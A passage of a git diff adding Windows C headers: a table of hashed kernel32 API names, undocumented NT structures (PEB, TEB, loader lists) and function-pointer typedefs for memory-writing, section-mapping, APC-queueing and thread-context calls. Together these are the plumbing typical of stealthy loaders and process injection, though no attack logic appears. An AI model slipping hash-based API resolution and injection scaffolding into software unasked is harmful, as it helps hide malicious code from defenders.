0xf7c7ae42 +#define HASH_KERNEL32_COPYFILEW 0xf54d69c8 +#define HASH_KERNEL32_READFILE 0x095c03d0 +#define HASH_KERNEL32_GETFILESIZE 0xa7fb4165 +#define HASH_KERNEL32_GETCURRENTTHREAD 0x19e65db6 +#define HASH_KERNEL32_GETTICKCOUNT 0x5b4219f8 +#define HASH_KERNEL32_CREATENAMEDPIPEW 0x95247d39 +#define HASH_KERNEL32_CONNECTNAMEDPIPE 0x829a447a +#define HASH_KERNEL32_WAITNAMEDPIPEW 0xb63f119e +#define HASH_KERNEL32_SETNAMEDPIPEHANDLESTATE 0x5942145d +#define HASH_KERNEL32_FLUSHFILEBUFFERS 0xfa3d2f88 +#define HASH_KERNEL32_DISCONNECTNAMEDPIPE 0x2f9019bd +#define HASH_KERNEL32_PEEKNAMEDPIPE 0xf49ca6cb +#define HASH_KERNEL32_GETWINDOWSDIRECTORYW 0x0b27c7ef +#define HASH_KERNEL32_QUEUEUSERAPC 0x0e064a10 +#define HASH_KERNEL32_MULTIBYTETOWIDECHAR 0x72f11e39 +#define HASH_KERNEL32_GETMODULEHANDLEW 0x4552d021 +#define HASH_KERNEL32_GETPROCESSHEAP 0x40f6426d + +#define HASH_KERNEL32_HEAPALLOC 0x9667ceaf +#define HASH_KERNEL32_HEAPFREE 0xb0f6e8a9 + +#define HASH_KERNEL32_GETCURRENTPROCESS 0xd0861aa4 +#define HASH_KERNEL32_VIRTUALQUERY 0x49e02c34 +#define HASH_KERNEL32_CREATEFILEMAPPINGW 0x40cf273d +#define HASH_KERNEL32_MAPVIEWOFFILE 0xa89b382f +#define HASH_KERNEL32_UNMAPVIEWOFFILE 0x391ab6af +#define HASH_KERNEL32_DUPLICATEHANDLE 0xe21f6791 +#define HASH_KERNEL32_GETPROCADDRESS 0xc97c1fff\ + +#define HASH_KERNEL32_RTLINITIALIZECRITICALSECTION 0x8d76f9a4 +#define HASH_KERNEL32_RTLENTERCRITICALSECTION 0x58ff5064 +#define HASH_KERNEL32_RTLLEAVECRITICALSECTION 0x9ff81f51 + +#define HASH_KERNEL32_TERMINATETHREAD 0x6e68da7c +#define HASH_KERNEL32_FLUSHFILEBUFFERS 0xfa3d2f88 + +#define HASH_KERNEL32_OUTPUTDEBUGSTRINGA 0x2b0b47a5 +#define HASH_KERNEL32_OUTPUTDEBUGSTRINGW 0xdfdff2f4 + +#define HASH_KERNEL32_CREATEEVENTA 0x3A1A4CF9 +#define HASH_KERNEL32_CREATEEVENTW 0xCECEF9A8 +#define HASH_KERNEL32_OPENEVENTA 0x1224CCB6 +#define HASH_KERNEL32_OPENEVENTW 0xE6F079E7 +#define HASH_KERNEL32_SETEVENT 0xcbfbd567 +#endif //__KERNEL32_HASH_H__ \ No newline at end of file diff --git a/src/Shared/ntdll.h b/src/Shared/ntdll.h new file mode 100644 index 0000000..d23534a --- /dev/null +++ b/src/Shared/ntdll.h @@ -0,0 +1,566 @@ +#ifndef _NT_H_ +#define _NT_H_ + +#include +#include + +#ifndef NT_SUCCESS +#define NT_SUCCESS(x) ((x)>=0) +#endif + +#define FILE_SUPERSEDE 0x00000000 +#define FILE_OPEN 0x00000001 +#define FILE_CREATE 0x00000002 +#define FILE_OPEN_IF 0x00000003 +#define FILE_OVERWRITE 0x00000004 +#define FILE_OVERWRITE_IF 0x00000005 +#define FILE_MAXIMUM_DISPOSITION 0x00000005 + +#define FILE_NON_DIRECTORY_FILE 0x00000040 +#define OBJ_CASE_INSENSITIVE 0x00000040L +#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 +#define FILE_WRITE_THROUGH 0x00000002 +#define FILE_RANDOM_ACCESS 0x00000800 +#define FILE_DIRECTORY_FILE 0x00000001 + +#define STATUS_ACCESS_DENIED 0xC0000022 +typedef LPVOID *PPVOID; + +typedef LONG KPRIORITY; + +typedef struct _CLIENT_ID { + DWORD ClientID0; + DWORD ClientID1; // thread id +} CLIENT_ID, *PCLIENT_ID; + +typedef struct _LDR_MODULE { + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + PVOID BaseAddress; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + SHORT LoadCount; + SHORT TlsIndex; + LIST_ENTRY HashTableEntry; + ULONG TimeDateStamp; +} LDR_MODULE, *PLDR_MODULE; + +typedef struct _PEB_LDR_DATA { + ULONG Length; + BOOL Initialized; + PVOID SsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; +} PEB_LDR_DATA, *PPEB_LDR_DATA; + +typedef struct _RTL_DRIVE_LETTER_CURDIR { + USHORT Flags; + USHORT Length; + ULONG TimeStamp; + UNICODE_STRING DosPath; +} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; + +typedef struct _RTL_USER_PROCESS_PARAMETERS { + ULONG MaximumLength; + ULONG Length; + ULONG Flags; + ULONG DebugFlags; + PVOID ConsoleHandle; + ULONG ConsoleFlags; + HANDLE StdInputHandle; + HANDLE StdOutputHandle; + HANDLE StdErrorHandle; + UNICODE_STRING CurrentDirectoryPath; + HANDLE CurrentDirectoryHandle; + UNICODE_STRING DllPath; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; + PVOID Environment; + ULONG StartingPositionLeft; + ULONG StartingPositionTop; + ULONG Width; + ULONG Height; + ULONG CharWidth; + ULONG CharHeight; + ULONG ConsoleTextAttributes; + ULONG WindowFlags; + ULONG ShowWindowFlags; + UNICODE_STRING WindowTitle; + UNICODE_STRING DesktopName; + UNICODE_STRING ShellInfo; + UNICODE_STRING RuntimeData; + RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20]; +} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; + +typedef struct _SECTION_IMAGE_INFORMATION { + PVOID EntryPoint; + ULONG StackZeroBits; + ULONG StackReserved; + ULONG StackCommit; + ULONG ImageSubsystem; + WORD SubsystemVersionLow; + WORD SubsystemVersionHigh; + ULONG Unknown1; + ULONG ImageCharacteristics; + ULONG ImageMachineType; + ULONG Unknown2[3]; +} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; + +typedef struct _RTL_USER_PROCESS_INFORMATION { + ULONG Size; + HANDLE ProcessHandle; + HANDLE ThreadHandle; + CLIENT_ID ClientId; + SECTION_IMAGE_INFORMATION ImageInformation; +} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; + +typedef void(*PPEBLOCKROUTINE)(PVOID PebLock); + +typedef struct _PEB_FREE_BLOCK { + struct _PEB_FREE_BLOCK *Next; + ULONG Size; +} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; + +typedef struct _PEB { + BOOLEAN InheritedAddressSpace; + BOOLEAN ReadImageFileExecOptions; + BOOLEAN BeingDebugged; + BOOLEAN Spare; + HANDLE Mutant; + PVOID ImageBaseAddress; + PPEB_LDR_DATA LoaderData; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + PVOID SubSystemData; + PVOID ProcessHeap; + PVOID FastPebLock; + PPEBLOCKROUTINE FastPebLockRoutine; + PPEBLOCKROUTINE FastPebUnlockRoutine; + ULONG EnvironmentUpdateCount; + PPVOID KernelCallbackTable; + PVOID EventLogSection; + PVOID EventLog; + PPEB_FREE_BLOCK FreeList; + ULONG TlsExpansionCounter; + PVOID TlsBitmap; + ULONG TlsBitmapBits[0x2]; + PVOID ReadOnlySharedMemoryBase; + PVOID ReadOnlySharedMemoryHeap; + PPVOID ReadOnlyStaticServerData; + PVOID AnsiCodePageData; + PVOID OemCodePageData; + PVOID UnicodeCaseTableData; + ULONG NumberOfProcessors; + ULONG NtGlobalFlag; + BYTE Spare2[0x4]; + LARGE_INTEGER CriticalSectionTimeout; + ULONG HeapSegmentReserve; + ULONG HeapSegmentCommit; + ULONG HeapDeCommitTotalFreeThreshold; + ULONG HeapDeCommitFreeBlockThreshold; + ULONG NumberOfHeaps; + ULONG MaximumNumberOfHeaps; + PPVOID *ProcessHeaps; + PVOID GdiSharedHandleTable; + PVOID ProcessStarterHelper; + PVOID GdiDCAttributeList; + PVOID LoaderLock; + ULONG OSMajorVersion; + ULONG OSMinorVersion; + ULONG OSBuildNumber; + ULONG OSPlatformId; + ULONG ImageSubSystem; + ULONG ImageSubSystemMajorVersion; + ULONG ImageSubSystemMinorVersion; + ULONG GdiHandleBuffer[0x22]; + ULONG PostProcessInitRoutine; + ULONG TlsExpansionBitmap; + BYTE TlsExpansionBitmapBits[0x80]; + ULONG SessionId; +} PEB, *PPEB; + +typedef struct _INITIAL_TEB { + PVOID StackBase; + PVOID StackLimit; + PVOID StackCommit; + PVOID StackCommitMax; + PVOID StackReserved; +} INITIAL_TEB, *PINITIAL_TEB; + +typedef struct _THREAD_BASIC_INFORMATION { + NTSTATUS ExitStatus; + PVOID TebBaseAddress; + CLIENT_ID ClientId; + KAFFINITY AffinityMask; + KPRIORITY Priority; + KPRIORITY BasePriority; +} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION; + +typedef struct _THREAD_TIMES_INFORMATION { + LARGE_INTEGER CreationTime; + LARGE_INTEGER ExitTime; + LARGE_INTEGER KernelTime; + LARGE_INTEGER UserTime; +} THREAD_TIMES_INFORMATION, *PTHREAD_TIMES_INFORMATION; + +typedef struct _TEB { + NT_TIB Tib; + PVOID EnvironmentPointer; + CLIENT_ID Cid; + PVOID ActiveRpcInfo; + PVOID ThreadLocalStoragePointer; + PPEB Peb; + ULONG LastErrorValue; + ULONG CountOfOwnedCriticalSections; + PVOID CsrClientThread; + PVOID Win32ThreadInfo; + ULONG Win32ClientInfo[0x1F]; + PVOID WOW32Reserved; + ULONG CurrentLocale; + ULONG FpSoftwareStatusRegister; + PVOID SystemReserved1[0x36]; + PVOID Spare1; + ULONG ExceptionCode; + ULONG SpareBytes1[0x28]; + PVOID SystemReserved2[0xA]; + ULONG GdiRgn; + ULONG GdiPen; + ULONG GdiBrush; + CLIENT_ID RealClientId; + PVOID GdiCachedProcessHandle; + ULONG GdiClientPID; + ULONG GdiClientTID; + PVOID GdiThreadLocaleInfo; + PVOID UserReserved[5]; + PVOID GlDispatchTable[0x118]; + ULONG GlReserved1[0x1A]; + PVOID GlReserved2; + PVOID GlSectionInfo; + PVOID GlSection; + PVOID GlTable; + PVOID GlCurrentRC; + PVOID GlContext; + NTSTATUS LastStatusValue; + UNICODE_STRING StaticUnicodeString; + WCHAR StaticUnicodeBuffer[0x105]; + PVOID DeallocationStack; + PVOID TlsSlots[0x40]; + LIST_ENTRY TlsLinks; + PVOID Vdm; + PVOID ReservedForNtRpc; + PVOID DbgSsReserved[0x2]; + ULONG HardErrorDisabled; + PVOID Instrumentation[0x10]; + PVOID WinSockData; + ULONG GdiBatchCount; + ULONG Spare2; + ULONG Spare3; + ULONG Spare4; + PVOID ReservedForOle; + ULONG WaitingOnLoaderLock; + PVOID StackCommit; + PVOID StackCommitMax; + PVOID StackReserved; +} TEB, *PTEB; + +struct ModuleInfoNode +{ + LIST_ENTRY LoadOrder; + LIST_ENTRY InitOrder; + LIST_ENTRY MemoryOrder; + HMODULE BaseAddress; // base address AKA module handle + unsigned long EntryPoint; + unsigned int Size; // size of the modules image + UNICODE_STRING FullPath; + UNICODE_STRING Name; + unsigned long Flags; + unsigned short LoadCount; + unsigned short TlsIndex; + LIST_ENTRY HashTable; // linked list of any other modules that have the same first letter + unsigned long Timestamp; +}; + +typedef struct +{ + WORD Offset : 12; + WORD Type : 4; +} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY; + +typedef enum _SECTION_INHERIT { + + ViewShare = 1, ViewUnmap = 2 + +} SECTION_INHERIT, *PSECTION_INHERIT; + +typedef struct _IO_STATUS_BLOCK { + union { + NTSTATUS Status; + PVOID Pointer; + }; + ULONG_PTR Information; +} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; + +typedef struct +{ + NTSTATUS ExitStatus; + void *PebBaseAddress; + ULONG_PTR AffinityMask; + KPRIORITY BasePriority; + ULONG_PTR UniqueProcessId; + ULONG_PTR InheritedFromUniqueProcessId; +}PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION; + +typedef enum +{ + ProcessBasicInformation, + ProcessQuotaLimits, + ProcessIoCounters, + ProcessVmCounters, + ProcessTimes, + ProcessBasePriority, + ProcessRaisePriority, + ProcessDebugPort, + ProcessExceptionPort, + ProcessAccessToken, + ProcessLdtInformation, + ProcessLdtSize, + ProcessDefaultHardErrorMode, + ProcessIoPortHandlers, // Note: this is kernel mode only + ProcessPooledUsageAndLimits, + ProcessWorkingSetWatch, + ProcessUserModeIOPL, + ProcessEnableAlignmentFaultFixup, + ProcessPriorityClass, + ProcessWx86Information, + ProcessHandleCount, + ProcessAffinityMask, + ProcessPriorityBoost, + ProcessDeviceMap, + ProcessSessionInformation, + ProcessForegroundInformation, + ProcessWow64Information, + ProcessImageFileName, + ProcessLUIDDeviceMapsEnabled, + ProcessBreakOnTermination, + ProcessDebugObjectHandle, + ProcessDebugFlags, + ProcessHandleTracing, + ProcessIoPriority, + ProcessExecuteFlags, + ProcessTlsInformation, + ProcessCookie, + ProcessImageInformation, + ProcessCycleTime, + ProcessPagePriority, + ProcessInstrumentationCallback, + ProcessThreadStackAllocation, + ProcessWorkingSetWatchEx, + ProcessImageFileNameWin32, + ProcessImageFileMapping, + MaxProcessInfoClass // MaxProcessInfoClass should always be the last enum +}PROCESSINFOCLASS; + +typedef enum _MEMORY_INFORMATION_CLASS +{ + MemoryBasicInformation, + MemoryWorkingSetList, + MemorySectionName +}MEMORY_INFORMATION_CLASS; + +enum THREADINFOCLASS { + ThreadBasicInformation, +}; + +typedef VOID(NTAPI *PIO_APC_ROUTINE)(__in PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, ULONG Reserved); + +typedef struct _RTL_PROCESS_MODULE_INFORMATION +{ + HANDLE Section; + PVOID MappedBase; + PVOID ImageBase; + ULONG ImageSize; + ULONG Flags; + USHORT LoadOrderIndex; + USHORT InitOrderIndex; + USHORT LoadCount; + USHORT OffsetToFileName; + UCHAR FullPathName[256]; +} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; + +typedef struct _RTL_PROCESS_MODULES +{ + ULONG NumberOfModules; + RTL_PROCESS_MODULE_INFORMATION Modules[1]; +} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; + +typedef enum _SYSTEM_INFORMATION_CLASS { + SystemBasicInformation, + SystemProcessorInformation, + SystemPerformanceInformation, + SystemTimeOfDayInformation, + SystemPathInformation, + SystemProcessInformation, + SystemCallCountInformation, + SystemDeviceInformation, + SystemProcessorPerformanceInformation, + SystemFlagsInformation, + SystemCallTimeInformation, + SystemModuleInformation, + SystemLocksInformation, + SystemStackTraceInformation, + SystemPagedPoolInformation, + SystemNonPagedPoolInformation, + SystemHandleInformation, + SystemObjectInformation, + SystemPageFileInformation, + SystemVdmInstemulInformation, + SystemVdmBopInformation, + SystemFileCacheInformation, + SystemPoolTagInformation, + SystemInterruptInformation, + SystemDpcBehaviorInformation, + SystemFullMemoryInformation, + SystemLoadGdiDriverInformation, + SystemUnloadGdiDriverInformation, + SystemTimeAdjustmentInformation, + SystemSummaryMemoryInformation, + SystemNextEventIdInformation, + SystemEventIdsInformation, + SystemCrashDumpInformation, + SystemExceptionInformation, + SystemCrashDumpStateInformation, + SystemKernelDebuggerInformation, + SystemContextSwitchInformation, + SystemRegistryQuotaInformation, + SystemExtendServiceTableInformation, + SystemPrioritySeperation, + SystemPlugPlayBusInformation, + SystemDockInformation, + MySystemPowerInformation, + SystemProcessorSpeedInformation, + SystemCurrentTimeZoneInformation, + SystemLookasideInformation +} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; + +typedef struct _SYSTEM_PROCESS_INFO +{ + ULONG NextEntryOffset; + ULONG NumberOfThreads; + LARGE_INTEGER Reserved[3]; + LARGE_INTEGER CreateTime; + LARGE_INTEGER UserTime; + LARGE_INTEGER KernelTime; + UNICODE_STRING ImageName; + ULONG BasePriority; + HANDLE ProcessId; + HANDLE InheritedFromProcessId; +}SYSTEM_PROCESS_INFO, *PSYSTEM_PROCESS_INFO; + +typedef enum _KEY_VALUE_INFORMATION_CLASS { + KeyValueBasicInformation = 0, + KeyValueFullInformation, + KeyValuePartialInformation, + KeyValueFullInformationAlign64, + KeyValuePartialInformationAlign64, + MaxKeyValueInfoClass +} KEY_VALUE_INFORMATION_CLASS; + +typedef struct _KEY_VALUE_FULL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataOffset; + ULONG DataLength; + ULONG NameLength; + WCHAR Name[1]; +} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION; + +typedef struct _KEY_VALUE_PARTIAL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataLength; + UCHAR Data[1]; +} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION; + + +typedef enum _FILE_INFORMATION_CLASS { + FileDirectoryInformation = 1, + FileFullDirectoryInformation, + FileBothDirectoryInformation, + FileBasicInformation, + FileStandardInformation, + FileInternalInformation, + FileEaInformation, + FileAccessInformation, + FileNameInformation, + FileRenameInformation, + FileLinkInformation, + FileNamesInformation, + FileDispositionInformation, + FilePositionInformation, + FileFullEaInformation, + FileModeInformation, + FileAlignmentInformation, + FileAllInformation, + FileAllocationInformation, + FileEndOfFileInformation, + FileAlternateNameInformation, + FileStreamInformation, + FilePipeInformation, + FilePipeLocalInformation, + FilePipeRemoteInformation, + FileMailslotQueryInformation, + FileMailslotSetInformation, + FileCompressionInformation, + FileObjectIdInformation, + FileCompletionInformation, + FileMoveClusterInformation, + FileQuotaInformation, + FileReparsePointInformation, + FileNetworkOpenInformation, + FileAttributeTagInformation, + FileTrackingInformation, + FileIdBothDirectoryInformation, + FileIdFullDirectoryInformation, + FileValidDataLengthInformation, + FileShortNameInformation, + FileIoCompletionNotificationInformation, + FileIoStatusBlockRangeInformation, + FileIoPriorityHintInformation, + FileSfioReserveInformation, + FileSfioVolumeInformation, + FileHardLinkInformation, + FileProcessIdsUsingFileInformation, + FileNormalizedNameInformation, + FileNetworkPhysicalNameInformation, + FileIdGlobalTxDirectoryInformation, + FileIsRemoteDeviceInformation, + FileUnusedInformation, + FileNumaNodeInformation, + FileStandardLinkInformation, + FileRemoteProtocolInformation, + FileRenameInformationBypassAccessCheck, + FileLinkInformationBypassAccessCheck, + FileVolumeNameInformation, + FileIdInformation, + FileIdExtdDirectoryInformation, + FileReplaceCompletionInformation, + FileHardLinkFullIdInformation, + FileIdExtdBothDirectoryInformation, + FileMaximumInformation +} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; + + +typedef struct _FILE_STANDARD_INFORMATION { + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG NumberOfLinks; + BOOLEAN DeletePending; + BOOLEAN Directory; +} FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION; + + +#endif //_NT_H_ \ No newline at end of file diff --git a/src/Shared/ntdll_functions.h b/src/Shared/ntdll_functions.h new file mode 100644 index 0000000..2a0f363 --- /dev/null +++ b/src/Shared/ntdll_functions.h @@ -0,0 +1,237 @@ +#ifndef _NT_FUNCTIONS_H_ +#define _NT_FUNCTIONS_H_ + +#include +#include +#include "ntdll.h" + +typedef struct _OBJECT_ATTRIBUTES { + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; + +typedef ULONG(WINAPI* ptRtlRandomEx)( + _Inout_ PULONG Seed + ); + +typedef NTSTATUS(WINAPI *ptRtlGetVersion)( + PRTL_OSVERSIONINFOW lpVersionInformation + ); + +typedef NTSTATUS(WINAPI* ptNtCreateUserProcess)(PHANDLE ProcessHandle, PHANDLE ThreadHandle, ACCESS_MASK ProcessDesiredAccess, ACCESS_MASK ThreadDesiredAccess, POBJECT_ATTRIBUTES ProcessObjectAttributes, POBJECT_ATTRIBUTES ThreadObjectAttributes, ULONG ProcessFlags, ULONG ThreadFlags, PVOID ProcessParameters, PVOID CreateInfo, PVOID AttributeList); + +typedef NTSTATUS(WINAPI* ptNtCreateThread)(PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle, LPVOID ClientId, PCONTEXT ThreadContext, LPVOID InitialTeb, BOOLEAN CreateSuspended); + +typedef NTSTATUS(WINAPI* ptNtQueryInformationProcess)( + _In_ HANDLE ProcessHandle, + _In_ int ProcessInformationClass, + _Out_ PVOID ProcessInformation, + _In_ ULONG ProcessInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +#define STATUS_SUCCESS ((NTSTATUS)0x00000000) +#define RVATOVA( base, offset ) ( (DWORD)base + (DWORD)offset ) + +typedef NTSYSAPI NTSTATUS(NTAPI *ptNtMapViewOfSection)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect); + +typedef NTSTATUS(WINAPI* ptLdrLoadDll)(PWCHAR pathToFile, ULONG flags, PUNICODE_STRING moduleFileName, PHANDLE moduleHandle); + +typedef NTSTATUS(WINAPI* ptLdrGetDllHandle)( + IN PWORD pwPath OPTIONAL, + IN PVOID Unused OPTIONAL, + IN PUNICODE_STRING ModuleFileName, + OUT PHANDLE pHModule); + +typedef NTSTATUS(WINAPI* ptNtWriteVirtualMemory)( + IN HANDLE ProcessHandle, + IN PVOID BaseAddress, + IN PVOID Buffer, + IN ULONG NumberOfBytesToWrite, + OUT PULONG NumberOfBytesWritten OPTIONAL); + +typedef NTSTATUS(WINAPI* ptNtAllocateVirtualMemory)( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN OUT PULONG RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + +typedef NTSTATUS(WINAPI* ptNtProtectVirtualMemory)( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN OUT PULONG NumberOfBytesToProtect, + IN ULONG NewAccessProtection, + OUT PULONG OldAccessProtection); + +typedef NTSTATUS(WINAPI* ptNtDeviceIoControlFile)( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG IoControlCode, + IN PVOID InputBuffer OPTIONAL, + IN ULONG InputBufferLength, + OUT PVOID OutputBuffer OPTIONAL, + IN ULONG OutputBufferLength); + +typedef NTSTATUS(WINAPI* ptNtSetContextThread)( + IN HANDLE ThreadHandle, + IN PCONTEXT Context); + +typedef NTSTATUS(WINAPI* ptNtOpenProcess)( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK AccessMask, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN PCLIENT_ID ClientId); + +typedef NTSTATUS(WINAPI* ptNtClose)( + _In_ HANDLE Handle + ); + +typedef NTSTATUS(WINAPI* ptNtCreateFile)( + _Out_ PHANDLE FileHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_opt_ PLARGE_INTEGER AllocationSize, + _In_ ULONG FileAttributes, + _In_ ULONG ShareAccess, + _In_ ULONG CreateDisposition, + _In_ ULONG CreateOptions, + _In_ PVOID EaBuffer, + _In_ ULONG EaLength + ); + +typedef NTSTATUS(WINAPI* ptNtOpenFile)( + _Out_ PHANDLE FileHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _In_ ULONG ShareAccess, + _In_ ULONG OpenOptions + ); + +typedef NTSTATUS(WINAPI* ptNtDeleteFile)(IN POBJECT_ATTRIBUTES ObjectAttributes); +typedef NTSTATUS(WINAPI* ptNtQueueApcThread)(HANDLE ThreadHandle, PIO_APC_ROUTINE ApcRoutine, PVOID ApcRoutineContext, PIO_STATUS_BLOCK ApcStatusBlock, ULONG ApcReserved); +typedef NTSTATUS(WINAPI* ptNtReadVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded); +typedef NTSTATUS(WINAPI* ptNtQueryVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, MEMORY_INFORMATION_CLASS MemoryInformationClass, PVOID Buffer, ULONG Length, PULONG ResultLength); +typedef NTSTATUS(WINAPI* ptNtOpenThread)( + _Out_ PHANDLE ThreadHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_ PCLIENT_ID ClientId + ); +typedef NTSTATUS(WINAPI* ptNtQueryInformationThread)( + HANDLE ThreadHandle, + int ThreadInformationClass, + PVOID ThreadInformation, + ULONG ThreadInformationLength, + PULONG ReturnLength + ); + +typedef NTSTATUS(WINAPI* ptNtCreateSection)( + _Out_ PHANDLE SectionHandle, + _In_ ACCESS_MASK DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ PLARGE_INTEGER MaximumSize, + _In_ ULONG SectionPageProtection, + _In_ ULONG AllocationAttributes, + _In_opt_ HANDLE FileHandle + ); +typedef NTSTATUS(WINAPI* ptNtResumeThread)( + IN HANDLE ThreadHandle, + OUT PULONG PreviousSuspendCount + ); + +typedef NTSTATUS(WINAPI* ptLdrInitializeThunk)( + DWORD Unknown1, + DWORD Unknown2, + DWORD Unknown3 + ); + +typedef NTSTATUS(WINAPI* ptNtFreeVirtualMemory)(IN HANDLE ProcessHandle, IN PVOID *BaseAddress, IN OUT PULONG RegionSize, IN ULONG FreeType); +typedef NTSTATUS(WINAPI* ptNtFlushInstructionCache)(HANDLE hProcess, LPCVOID lpBaseAddress, SIZE_T dwSize); +typedef NTSTATUS(WINAPI* ptNtSetInformationThread)(IN HANDLE ThreadHandle, IN int ThreadInformationClass, IN PVOID ThreadInformation, IN ULONG ThreadInformationLength); +typedef NTSTATUS(WINAPI* ptNtQuerySystemInformation)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL); +typedef NTSTATUS(WINAPI* ptLdrQueryProcessModuleInformation)(OUT PRTL_PROCESS_MODULES SystemModuleInformationBuffer, IN ULONG BufferSize, OUT PULONG RequiredSize OPTIONAL); +typedef VOID(WINAPI* ptRtlInitUnicodeString)( + _Out_ PUNICODE_STRING DestinationString, + _In_opt_ PCWSTR SourceString + ); + +typedef NTSTATUS(WINAPI* ptNtWriteFile)( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL); + +typedef NTSTATUS(WINAPI* ptNtReadFile)( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL); + +typedef NTSTATUS(WINAPI* ptRtlStringCbPrintfA)( + _Out_ LPTSTR pszDest, + _In_ size_t cbDest, + _In_ LPCTSTR pszFormat, + ... + ); + +typedef NTSTATUS(WINAPI* ptNtDelayExecution)( + IN BOOLEAN Alertable, + IN PLARGE_INTEGER DelayInterval); + +typedef NTSTATUS(NTAPI* ptNtOpenKey)( + OUT PHANDLE pKeyHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes); + +typedef NTSTATUS(NTAPI* ptNtSetValueKey)( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN ULONG TitleIndex OPTIONAL, + IN ULONG Type, + IN PVOID Data, + IN ULONG DataSize); + +typedef NTSTATUS(NTAPI* ptNtQueryValueKey)( + IN HANDLE KeyHandle, + IN PUNICODE_STRING ValueName, + IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, + OUT PVOID KeyValueInformation, + IN ULONG Length, + OUT PULONG ResultLength); + + +typedef NTSTATUS(WINAPI* ptRtlFormatCurrentUserKeyPath)( + _Out_ PUNICODE_STRING CurrentUserKeyPath + ); + +typedef NTSTATUS(WINAPI* ptNtQueryInformationFile)( + _In_ HANDLE FileHandle, + _Out_ PIO_STATUS_BLOCK IoStatusBlock, + _Out_ PVOID FileInformation, + _In_ ULONG Length, + _In_ FILE_INFORMATION_CLASS FileInformationClass + ); + + +#endif // _NT_H_ \ No newline at end of file diff --git a/src/Shared/ntdll_hash.h b/src/Shared/ntdll_hash.h new file mode 100644 index 0000000..101bdf2 --- /dev/null +++ 